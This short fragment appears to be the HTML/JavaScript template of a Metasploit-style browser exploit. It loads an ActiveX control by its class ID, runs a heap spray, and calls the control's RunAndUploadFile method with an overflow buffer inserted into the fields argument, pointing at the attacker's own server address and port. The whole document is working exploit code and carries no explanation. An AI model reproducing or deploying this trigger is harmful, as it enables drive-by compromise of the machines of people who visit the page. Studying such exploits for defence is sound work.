<html>
    <head>
    <script>
      #{js_spray}
    </script>
    </head>
    <object classid='clsid:84B74E82-3475-420E-9949-773B4FB91771' id='isig'></object>
    <script>
      var url = "http://#{Rex::Socket.source_address('1.2.3.4')}:#{datastore['SRVPORT']}/tpmx/uploadEG2.do";
      var fields = "submit:#{bof};FROM_EMAIL:true;userKey:2";
      var flags = "-level5";
      msg = isig.RunAndUploadFile(url, fields, flags);
    </script>
    </html>